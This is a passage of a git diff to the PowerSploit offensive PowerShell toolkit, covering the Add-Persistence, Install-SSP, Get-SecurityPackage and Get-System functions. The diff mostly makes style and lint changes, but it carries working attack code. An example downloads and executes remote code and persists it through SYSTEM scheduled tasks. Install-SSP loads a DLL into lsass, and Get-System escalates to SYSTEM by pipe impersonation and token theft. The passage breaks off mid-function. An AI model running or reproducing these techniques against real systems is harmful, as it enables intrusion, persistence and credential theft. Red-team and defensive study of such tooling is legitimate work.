-    C:\PS>$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }
-    C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
-    C:\PS>$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
-    C:\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1
+$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }
+$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
+$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
+Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1
 
-    Description
-    -----------
-    Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement. The final, encoded output is finally saved to .\EncodedPersistentScript.ps1
+Description
+-----------
+Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement. The final, encoded output is finally saved to .\EncodedPersistentScript.ps1
 
 .LINK
 
-    http://www.exploit-monday.com
+http://www.exploit-monday.com
 #>
-
-    [CmdletBinding()] Param (
+    
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingInvokeExpression', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingCmdletAliases', '')]
+    [CmdletBinding()]
+    Param (
         [Parameter( Mandatory = $True, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )]
         [ValidateNotNullOrEmpty()]
         [ScriptBlock]
@@ -527,7 +536,6 @@ function Add-Persistence
 
 #region Initialize data
 
-    $CompressedScript = ''
     $UserTrigger = ''
     $UserTriggerRemoval = ''
     $ElevatedTrigger = "''"
@@ -598,7 +606,7 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
                 {
                     $ElevatedTrigger = "schtasks /Create /RU system /SC ONLOGON /TN Updater /TR "
                 }
-                
+
                 'Daily'
                 {
                     $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR "
@@ -736,7 +744,7 @@ $ElevatedTriggerRemoval
 $UserTriggerRemoval
 "@
 
-    
+
     $PersistantScript | Out-File $PersistentScriptFile
     Write-Verbose "Persistence script written to $PersistentScriptFile"
 
@@ -759,10 +767,10 @@ function Install-SSP
 
 Installs a security support provider (SSP) dll.
 
-Author: Matthew Graeber (@mattifestation)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None  
 
 .DESCRIPTION
 
@@ -785,7 +793,12 @@ if you are running a 64-bit OS. In order for the SSP dll to be loaded properly
 into lsass, the dll must export SpLsaModeInitialize.
 #>
 
-    [CmdletBinding()] Param (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingCmdletAliases', '')]
+    [CmdletBinding()]
+    Param (
         [ValidateScript({Test-Path (Resolve-Path $_)})]
         [String]
         $Path
@@ -811,43 +824,43 @@ into lsass, the dll must export SpLsaModeInitialize.
             [String]
             $Path
         )
-    
+
         # Parse PE header to see if binary was compiled 32 or 64-bit
         $FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read)
-    
+
         [Byte[]] $MZHeader = New-Object Byte[](2)
         $FileStream.Read($MZHeader,0,2) | Out-Null
-    
+
         $Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)
         if ($Header -ne 'MZ')
         {
             $FileStream.Close()
             Throw 'Invalid PE header.'
         }
-    
+
         # Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header)
         $FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null
-    
+
         [Byte[]] $lfanew = New-Object Byte[](4)
-    
+
         # Read offset to the PE Header (will be read in reverse)
         $FileStream.Read($lfanew,0,4) | Out-Null
-        $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | % { $_.ToString('X2') } ) -join ''))
-    
+        $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | ForEach-Object { $_.ToString('X2') } ) -join ''))
+
         # Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE
         $FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null
         [Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2)
-    
+
         # Read compiled architecture
         $FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null
-        $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '')
+        $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | ForEach-Object { $_.ToString('X2') } ) -join '')
         $FileStream.Close()
-    
+
         if (($Architecture -ne '014C') -and ($Architecture -ne '8664'))
         {
             Throw 'Invalid PE header or unsupported architecture.'
         }
-    
+
         if ($Architecture -eq '014C')
         {
             Write-Output '32-bit'
@@ -875,7 +888,7 @@ into lsass, the dll must export SpLsaModeInitialize.
 
     # Get the dll filename without the extension.
     # This will be added to the registry.
-    $DllName = $Dll | % { % {($_ -split '\.')[0]} }
+    $DllName = $Dll | ForEach-Object { % {($_ -split '\.')[0]} }
 
     # Enumerate all of the currently installed SSPs
     $SecurityPackages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' |
@@ -928,7 +941,8 @@ into lsass, the dll must export SpLsaModeInitialize.
 
     if ([IntPtr]::Size -eq 4) {
         $StructSize = 20
-    } else {
+    }
+    else {
         $StructSize = 24
     }
 
@@ -939,7 +953,8 @@ into lsass, the dll must export SpLsaModeInitialize.
 
     try {
         $Result = $Secur32::AddSecurityPackage($DllName, $StructPtr)
-    } catch {
+    }
+    catch {
         $HResult = $Error[0].Exception.InnerException.HResult
         Write-Warning "Runtime loading of the SSP failed. (0x$($HResult.ToString('X8')))"
         Write-Warning "Reason: $(([ComponentModel.Win32Exception] $HResult).Message)"
@@ -948,34 +963,37 @@ into lsass, the dll must export SpLsaModeInitialize.
 
     if ($RuntimeSuccess) {
         Write-Verbose 'Installation and loading complete!'
-    } else {
+    }
+    else {
         Write-Verbose 'Installation complete! Reboot for changes to take effect.'
     }
 }
 
-function Get-SecurityPackages
+function Get-SecurityPackage
 {
 <#
 .SYNOPSIS
 
 Enumerates all loaded security packages (SSPs).
 
-Author: Matthew Graeber (@mattifestation)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None  
 
 .DESCRIPTION
 
-Get-SecurityPackages is a wrapper for secur32!EnumerateSecurityPackages.
+Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages.
 It also parses the returned SecPkgInfo struct array.
 
 .EXAMPLE
 
-Get-SecurityPackages
+Get-SecurityPackage
 #>
 
-    [CmdletBinding()] Param()
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+    [CmdletBinding()]
+    Param()
 
     #region P/Invoke declarations for secur32.dll
     $DynAssembly = New-Object System.Reflection.AssemblyName('SSPI')
@@ -1084,4 +1102,4 @@ Get-SecurityPackages
 
         $SecPackage
     }
-}
\ No newline at end of file
+}
diff --git a/Privesc/Get-System.ps1 b/Privesc/Get-System.ps1
index f2b8014..fdb41d0 100644
--- a/Privesc/Get-System.ps1
+++ b/Privesc/Get-System.ps1
@@ -1,103 +1,109 @@
 function Get-System {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        GetSystem functionality inspired by Meterpreter's getsystem.
-        'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create
-        a service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege.
-        NOTE: if running PowerShell 2.0, start powershell.exe with '-STA' to ensure
-        token duplication works correctly.
+GetSystem functionality inspired by Meterpreter's getsystem.
 
-        PowerSploit Function: Get-System
-        Author: @harmj0y, @mattifestation
-        License: BSD 3-Clause
-        Required Dependencies: None
-        Optional Dependencies: None
+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect  
 
-    .PARAMETER Technique
+.DESCRIPTION
 
-        The technique to use, 'NamedPipe' or 'Token'.
+Executes "getsystem" functionality similar to Meterpreter.
+'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create
+a service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege.
+NOTE: if running PowerShell 2.0, start powershell.exe with '-STA' to ensure
+token duplication works correctly.
 
-    .PARAMETER ServiceName
 
-        The name of the service used with named pipe impersonation, defaults to 'TestSVC'.
+.PARAMETER Technique
 
-    .PARAMETER PipeName
+The technique to use, 'NamedPipe' or 'Token'.
 
-        The name of the named pipe used with named pipe impersonation, defaults to 'TestSVC'.
+.PARAMETER ServiceName
 
-    .PARAMETER RevToSelf
-    
-        Reverts the current thread privileges.
+The name of the service used with named pipe impersonation, defaults to 'TestSVC'.
 
-    .PARAMETER WhoAmI
+.PARAMETER PipeName
 
-        Switch. Display the credentials for the current PowerShell thread.
+The name of the named pipe used with named pipe impersonation, defaults to 'TestSVC'.
 
-    .EXAMPLE
-        
-        PS> Get-System
+.PARAMETER RevToSelf
 
-        Uses named impersonate to elevate the current thread token to SYSTEM.
+Reverts the current thread privileges.
 
-    .EXAMPLE
-        
-        PS> Get-System -ServiceName 'PrivescSvc' -PipeName 'secret'
+.PARAMETER WhoAmI
 
-        Uses named impersonate to elevate the current thread token to SYSTEM
-        with a custom service and pipe name.
+Switch. Display the credentials for the current PowerShell thread.
 
-    .EXAMPLE
-        
-        PS> Get-System -Technique Token
+.EXAMPLE
 
-        Uses token duplication to elevate the current thread token to SYSTEM.
+Get-System
 
-    .EXAMPLE
-        
-        PS> Get-System -WhoAmI
+Uses named impersonate to elevate the current thread token to SYSTEM.
 
-        Displays the credentials for the current thread.
+.EXAMPLE
 
-    .EXAMPLE
-        
-        PS> Get-System -RevToSelf
+Get-System -ServiceName 'PrivescSvc' -PipeName 'secret'
 
-        Reverts the current thread privileges.
+Uses named impersonate to elevate the current thread token to SYSTEM
+with a custom service and pipe name.
 
-    .LINK
-    
-        https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c
-        https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot
-        http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
-        http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
+.EXAMPLE
+
+Get-System -Technique Token
+
+Uses token duplication to elevate the current thread token to SYSTEM.
+
+.EXAMPLE
+
+Get-System -WhoAmI
+
+Displays the credentials for the current thread.
+
+.EXAMPLE
+
+Get-System -RevToSelf
+
+Reverts the current thread privileges.
+
+.LINK
+
+https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c
+https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot
+http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
+http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
 #>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
     [CmdletBinding(DefaultParameterSetName = 'NamedPipe')]
     param(
-        [Parameter(ParameterSetName = "NamedPipe")]
-        [Parameter(ParameterSetName = "Token")]
+        [Parameter(ParameterSetName = 'NamedPipe')]
+        [Parameter(ParameterSetName = 'Token')]
         [String]
-        [ValidateSet("NamedPipe", "Token")]
+        [ValidateSet('NamedPipe', 'Token')]
         $Technique = 'NamedPipe',
 
-        [Parameter(ParameterSetName = "NamedPipe")]
+        [Parameter(ParameterSetName = 'NamedPipe')]
         [String]
         $ServiceName = 'TestSVC',
 
-        [Parameter(ParameterSetName = "NamedPipe")]
+        [Parameter(ParameterSetName = 'NamedPipe')]
         [String]
         $PipeName = 'TestSVC',
 
-        [Parameter(ParameterSetName = "RevToSelf")]
+        [Parameter(ParameterSetName = 'RevToSelf')]
         [Switch]
         $RevToSelf,
 
-        [Parameter(ParameterSetName = "WhoAmI")]
+        [Parameter(ParameterSetName = 'WhoAmI')]
         [Switch]
         $WhoAmI
     )
 
-    $ErrorActionPreference = "Stop"
+    $ErrorActionPreference = 'Stop'
 
     # from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html
     function Local:Get-DelegateType
@@ -105,11 +111,11 @@ function Get-System {
         Param
         (
             [OutputType([Type])]
-            
+
             [Parameter( Position = 0)]
             [Type[]]
             $Parameters = (New-Object Type[](0)),
-            
+
             [Parameter( Position = 1 )]
             [Type]
             $ReturnType = [Void]
@@ -124,7 +130,7 @@ function Get-System {
         $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
         $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
         $MethodBuilder.SetImplementationFlags('Runtime, Managed')
-        
+
         Write-Output $TypeBuilder.CreateType()
     }
 
@@ -134,11 +140,11 @@ function Get-System {
         Param
         (
             [OutputType([IntPtr])]
-        
+
             [Parameter( Position = 0, Mandatory = $True )]
             [String]
             $Module,
-            
+
             [Parameter( Position = 1, Mandatory = $True )]
             [String]
             $Procedure
@@ -155,7 +161,7 @@ function Get-System {
         $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
         $tmpPtr = New-Object IntPtr
         $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
-        
+
         # Return the address of the function
         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
     }
@@ -165,10 +171,10 @@ function Get-System {
     function Local:Get-SystemNamedPipe {
         param(
             [String]
-            $ServiceName = "TestSVC",
+            $ServiceName = 'TestSVC',
 
             [String]
-            $PipeName = "TestSVC"
+            $PipeName = 'TestSVC'
         )
 
         $Command = "%COMSPEC% /C start %COMSPEC% /C `"timeout /t 3 >nul&&echo $PipeName > \\.\pipe\$PipeName`""
@@ -177,14 +183,14 @@ function Get-System {
 
         # create the named pipe used for impersonation and set appropriate permissions
         $PipeSecurity = New-Object System.IO.Pipes.PipeSecurity
-        $AccessRule = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
+        $AccessRule = New-Object System.IO.Pipes.PipeAccessRule('Everyone', 'ReadWrite', 'Allow')
         $PipeSecurity.AddAccessRule($AccessRule)
-        $Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName,"InOut",100, "Byte", "None", 1024, 1024, $PipeSecurity)
+        $Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName, 'InOut', 100, 'Byte', 'None', 1024, 1024, $PipeSecurity)
 
         $PipeHandle = $Pipe.SafePipeHandle.DangerousGetHandle()
 
         # Declare/setup all the needed API function
-        #   adapted heavily from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html 
+        #   adapted heavily from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html
         $ImpersonateNamedPipeClientAddr = Get-ProcAddress Advapi32.dll ImpersonateNamedPipeClient
         $ImpersonateNamedPipeClientDelegate = Get-DelegateType @( [Int] ) ([Int])
         $ImpersonateNamedPipeClient = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateNamedPipeClientAddr, $ImpersonateNamedPipeClientDelegate)
@@ -196,11 +202,11 @@ function Get-System {
         $OpenSCManagerAAddr = Get-ProcAddress Advapi32.dll OpenSCManagerA
         $OpenSCManagerADelegate = Get-DelegateType @( [String], [String], [Int]) ([IntPtr])
         $OpenSCManagerA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenSCManagerAAddr, $OpenSCManagerADelegate)
-        
+
         $OpenServiceAAddr = Get-ProcAddress Advapi32.dll OpenServiceA
         $OpenServiceADelegate = Get-DelegateType @( [IntPtr], [String], [Int]) ([IntPtr])
         $OpenServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenServiceAAddr, $OpenServiceADelegate)
-      
+
         $CreateServiceAAddr = Get-ProcAddress Advapi32.dll CreateServiceA
         $CreateServiceADelegate = Get-DelegateType @( [IntPtr], [String], [String], [Int], [Int], [Int], [Int], [String], [String], [Int], [Int], [Int], [Int]) ([IntPtr])
         $CreateServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateServiceAAddr, $CreateServiceADelegate)
@@ -220,9 +226,9 @@ function Get-System {
         # Step 1 - OpenSCManager()
         # 0xF003F = SC_MANAGER_ALL_ACCESS
         #   http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
-        Write-Verbose "Opening service manager"
-        $ManagerHandle = $OpenSCManagerA.Invoke("\\localhost", "ServicesActive", 0xF003F)
-        Write-Verbose "Service manager handle: $ManagerHandle"
+        Write-Verbose '[Get-System] Opening service manager'
+        $ManagerHandle = $OpenSCManagerA.Invoke('\\localhost', 'ServicesActive', 0xF003F)
+        Write-Verbose "[Get-System] Service manager handle: $ManagerHandle"
 
         # if we get a non-zero handle back, everything was successful
         if ($ManagerHandle -and ($ManagerHandle -ne 0)) {
@@ -232,7 +238,7 @@ function Get-System {
             # 0x10 = SERVICE_WIN32_OWN_PROCESS
             # 0x3 = SERVICE_DEMAND_START
             # 0x1 = SERVICE_ERROR_NORMAL
-            Write-Verbose "Creating new service: '$ServiceName'"
+            Write-Verbose "[Get-System] Creating new service: '$ServiceName'"
             try {
                 $ServiceHandle = $CreateServiceA.Invoke($ManagerHandle, $ServiceName, $ServiceName, 0xF003F, 0x10, 0x3, 0x1, $Command, $null, $null, $null, $null, $null)
                 $err = $GetLastError.Invoke()
@@ -241,40 +247,40 @@ function Get-System {
                 Write-Warning "Error creating service : $_"
                 $ServiceHandle = 0
             }
-            Write-Verbose "CreateServiceA Handle: $ServiceHandle"
+            Write-Verbose "[Get-System] CreateServiceA Handle: $ServiceHandle"
 
             if ($ServiceHandle -and ($ServiceHandle -ne 0)) {
                 $Success = $True
-                Write-Verbose "Service successfully created"
+                Write-Verbose '[Get-System] Service successfully created'
 
                 # Step 3 - CloseServiceHandle() for the service handle
-                Write-Verbose "Closing service handle"
+                Write-Verbose '[Get-System] Closing service handle'
                 $Null = $CloseServiceHandle.Invoke($ServiceHandle)
 
                 # Step 4 - OpenService()
-                Write-Verbose "Opening the service '$ServiceName'"
+                Write-Verbose "[Get-System] Opening the service '$ServiceName'"
                 $ServiceHandle = $OpenServiceA.Invoke($ManagerHandle, $ServiceName, 0xF003F)
-                Write-Verbose "OpenServiceA handle: $ServiceHandle"
+                Write-Verbose "[Get-System] OpenServiceA handle: $ServiceHandle"
 
                 if ($ServiceHandle -and ($ServiceHandle -ne 0)){
 
                     # Step 5 - StartService()
-                    Write-Verbose "Starting the service"
+                    Write-Verbose '[Get-System] Starting the service'
                     $val = $StartServiceA.Invoke($ServiceHandle, $null, $null)
                     $err = $GetLastError.Invoke()
 
                     # if we successfully started the service, let it breathe and then delete it
                     if ($val -ne 0){
-                        Write-Verbose "Service successfully started"
+                        Write-Verbose '[Get-System] Service successfully started'
                         # breathe for a second
                         Start-Sleep -s 1
                     }
                     else{
                         if ($err -eq 1053){
-                            Write-Verbose "Command didn't respond to start"
+                            Write-Verbose "[Get-System] Command didn't respond to start"
                         }
                         else{
-                            Write-Warning "StartService failed, LastError: $err"
+                            Write-Warning "[Get-System] StartService failed, LastError: $err"
                         }
                         # breathe for a second
                         Start-Sleep -s 1
@@ -282,48 +288,48 @@ function Get-System {
 
                     # start cleanup
                     # Step 6 - DeleteService()
-                    Write-Verbose "Deleting the service '$ServiceName'"
+                    Write-Verbose "[Get-System] Deleting the service '$ServiceName'"
                     $val = $DeleteService.invoke($ServiceHandle)
                     $err = $GetLastError.Invoke()
 
                     if ($val -eq 0){
-                        Write-Warning "DeleteService failed, LastError: $err"
+                        Write-Warning "[Get-System] DeleteService failed, LastError: $err"
                     }
                     else{
-                        Write-Verbose "Service successfully deleted"
+                        Write-Verbose '[Get-System] Service successfully deleted'
                     }
-                
-                    # Step 7 - CloseServiceHandle() for the service handle 
-                    Write-Verbose "Closing the service handle"
+
+                    # Step 7 - CloseServiceHandle() for the service handle
+                    Write-Verbose '[Get-System] Closing the service handle'
                     $val = $CloseServiceHandle.Invoke($ServiceHandle)
-                    Write-Verbose "Service handle closed off"
+                    Write-Verbose '[Get-System] Service handle closed off'
                 }
                 else {
-                    Write-Warning "[!] OpenServiceA failed, LastError: $err"
+                    Write-Warning "[Get-System] OpenServiceA failed, LastError: $err"
                 }
             }
 
             else {
-                Write-Warning "[!] CreateService failed, LastError: $err"
+                Write-Warning "[Get-System] CreateService failed, LastError: $err"
             }
 
             # final cleanup - close off the manager handle
-            Write-Verbose "Closing the manager handle"
+            Write-Verbose '[Get-System] Closing the manager handle'
             $Null = $CloseServiceHandle.Invoke($ManagerHandle)
         }
         else {
             # error codes - http://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
-            Write-Warning "[!] OpenSCManager failed, LastError: $err"
+            Write-Warning "[Get-System] OpenSCManager failed, LastError: $err"
         }
 
         if($Success) {
-            Write-Verbose "Waiting for pipe connection"
+            Write-Verbose '[Get-System] Waiting for pipe connection'
             $Pipe.WaitForConnection()
 
             $Null = (New-Object System.IO.StreamReader($Pipe)).ReadToEnd()
 
             $Out = $ImpersonateNamedPipeClient.Invoke([Int]$PipeHandle)
-            Write-Verbose "ImpersonateNamedPipeClient: $Out"
+            Write-Verbose "[Get-System] ImpersonateNamedPipeClient: $Out"
         }
 
         # clocse off the named pipe
@@ -366,7 +372,7 @@ function Get-System {
         $PrivilegesField = $TokenPrivilegesTypeBuilder.DefineField('Privileges', $Luid_and_AttributesStruct.MakeArrayType(), 'Public')
         $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 1))
         $PrivilegesField.SetCustomAttribute($AttribBuilder)
-        $TokenPrivilegesStruct = $TokenPrivilegesTypeBuilder.CreateType()
+        # $TokenPrivilegesStruct = $TokenPrivilegesTypeBuilder.CreateType()
 
         $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder(
             ([Runtime.InteropServices.DllImportAttribute].GetConstructors()[0]),
@@ -452,18 +458,18 @@ function Get-System {
             @([IntPtr], [Bool], $TokPriv1LuidStruct.MakeByRefType(),[Int32], [IntPtr], [IntPtr]),
             [Runtime.InteropServices.CallingConvention]::Winapi,
             'Auto').SetCustomAttribute($AttribBuilder)
-        
+
         $Win32Methods = $Win32TypeBuilder.CreateType()
 
-        $Win32Native = [Int32].Assembly.GetTypes() | ? {$_.Name -eq 'Win32Native'}
+        $Win32Native = [Int32].Assembly.GetTypes() | Where-Object {$_.Name -eq 'Win32Native'}
         $GetCurrentProcess = $Win32Native.GetMethod(
             'GetCurrentProcess',
             [Reflection.BindingFlags] 'NonPublic, Static'
         )
-            
+
         $SE_PRIVILEGE_ENABLED = 0x00000002
         $STANDARD_RIGHTS_REQUIRED = 0x000F0000
-        $STANDARD_RIGHTS_READ = 0x00020000
+        # $STANDARD_RIGHTS_READ = 0x00020000
         $TOKEN_ASSIGN_PRIMARY = 0x00000001
         $TOKEN_DUPLICATE = 0x00000002
         $TOKEN_IMPERSONATE = 0x00000004
@@ -473,7 +479,7 @@ function Get-System {
         $TOKEN_ADJUST_GROUPS = 0x00000040
         $TOKEN_ADJUST_DEFAULT = 0x00000080
         $TOKEN_ADJUST_SESSIONID = 0x00000100
-        $TOKEN_READ = $STANDARD_RIGHTS_READ -bor $TOKEN_QUERY
+        # $TOKEN_READ = $STANDARD_RIGHTS_READ -bor $TOKEN_QUERY
         $TOKEN_ALL_ACCESS = $STANDARD_RIGHTS_REQUIRED -bor
             $TOKEN_ASSIGN_PRIMARY -bor
             $TOKEN_DUPLICATE -bor
@@ -492,18 +498,18 @@ function Get-System {
         $tokPriv1Luid.Luid = $Luid
         $tokPriv1Luid.Attr = $SE_PRIVILEGE_ENABLED
 
-        $RetVal = $Win32Methods::LookupPrivilegeValue($Null, "SeDebugPrivilege", [ref]$tokPriv1Luid.Luid)
+        $RetVal = $Win32Methods::LookupPrivilegeValue($Null, 'SeDebugPrivilege', [ref]$tokPriv1Luid.Luid)
 
         $htoken = [IntPtr]::Zero
         $RetVal = $Win32Methods::OpenProcessToken($GetCurrentProcess.Invoke($Null, @()), $TOKEN_ALL_ACCESS, [ref]$htoken)
 
-        $tokenPrivileges = [Activator]::CreateInstance($TokenPrivilegesStruct)
+        # $tokenPrivileges = [Activator]::CreateInstance($TokenPrivilegesStruct)
         $RetVal = $Win32Methods::AdjustTokenPrivileges($htoken, $False, [ref]$tokPriv1Luid, 12, [IntPtr]::Zero, [IntPtr]::Zero)
 
         if(-not($RetVal)) {
-            Write-Error "AdjustTokenPrivileges failed, RetVal : $RetVal" -ErrorAction Stop
+            Write-Error "[Get-System] AdjustTokenPrivileges failed, RetVal : $RetVal" -ErrorAction Stop
         }
-        
+
         $LocalSystemNTAccount = (New-Object -TypeName 'System.Security.Principal.SecurityIdentifier' -ArgumentList ([Security.Principal.WellKnownSidType]::'LocalSystemSid', $null)).Translate([Security.Principal.NTAccount]).Value
 
         $SystemHandle = Get-WmiObject -Class Win32_Process | ForEach-Object {
@@ -522,36 +528,38 @@ function Get-System {
                     }
                 }
             }
-            catch {}
-        } | Where-Object {$_ -and ($_ -ne 0)} | Select -First 1
-        
+            catch {
+                Write-Verbose "[Get-System] error enumerating handle: $_"
+            }
+        } | Where-Object {$_ -and ($_ -ne 0)} | Select-Object -First 1
+
         if ((-not $SystemHandle) -or ($SystemHandle -eq 0)) {
-            Write-Error 'Unable to obtain a handle to a system process.'
-        } 
+            Write-Error '[Get-System] Unable to obtain a handle to a system process.'
+        }
         else {
             [IntPtr]$SystemToken = [IntPtr]::Zero
             $RetVal = $Win32Methods::OpenProcessToken(([IntPtr][Int] $SystemHandle), ($TOKEN_IMPERSONATE -bor $TOKEN_DUPLICATE), [ref]$SystemToken);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()
 
-            Write-Verbose "OpenProcessToken result: $RetVal"
-            Write-Verbose "OpenProcessToken result: $LastError"
+            Write-Verbose "[Get-System] OpenProcessToken result: $RetVal"
+            Write-Verbose "[Get-System] OpenProcessToken result: $LastError"
 
             [IntPtr]$DulicateTokenHandle = [IntPtr]::Zero
             $RetVal = $Win32Methods::DuplicateToken($SystemToken, 2, [ref]$DulicateTokenHandle);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()
 
-            Write-Verbose "DuplicateToken result: $LastError"
+            Write-Verbose "[Get-System] DuplicateToken result: $LastError"
 
             $RetVal = $Win32Methods::SetThreadToken([IntPtr]::Zero, $DulicateTokenHandle);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()
             if(-not($RetVal)) {
-                Write-Error "SetThreadToken failed, RetVal : $RetVal" -ErrorAction Stop
+                Write-Error "[Get-System] SetThreadToken failed, RetVal : $RetVal" -ErrorAction Stop
             }
 
-            Write-Verbose "SetThreadToken result: $LastError"
+            Write-Verbose "[Get-System] SetThreadToken result: $LastError"
             $null = $Win32Methods::CloseHandle($Handle)
         }
     }
 
     if([System.Threading.Thread]::CurrentThread.GetApartmentState() -ne 'STA') {
-        Write-Error "Script must be run in STA mode, relaunch powershell.exe with -STA flag" -ErrorAction Stop
+        Write-Error "[Get-System] Script must be run in STA mode, relaunch powershell.exe with -STA flag" -ErrorAction Stop
     }
 
     if($PSBoundParameters['WhoAmI']) {
@@ -566,17 +574,17 @@ function Get-System {
 
         $RetVal = $RevertToSelf.Invoke()
         if($RetVal) {
-            Write-Output "RevertToSelf successful."
+            Write-Output "[Get-System] RevertToSelf successful."
         }
         else {
-            Write-Warning "RevertToSelf failed."
+            Write-Warning "[Get-System] RevertToSelf failed."
         }
         Write-Output "Running as: $([Environment]::UserDomainName)\$([Environment]::UserName)"
     }
 
     else {
         if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) {
-            Write-Error "Script must be run as administrator" -ErrorAction Stop
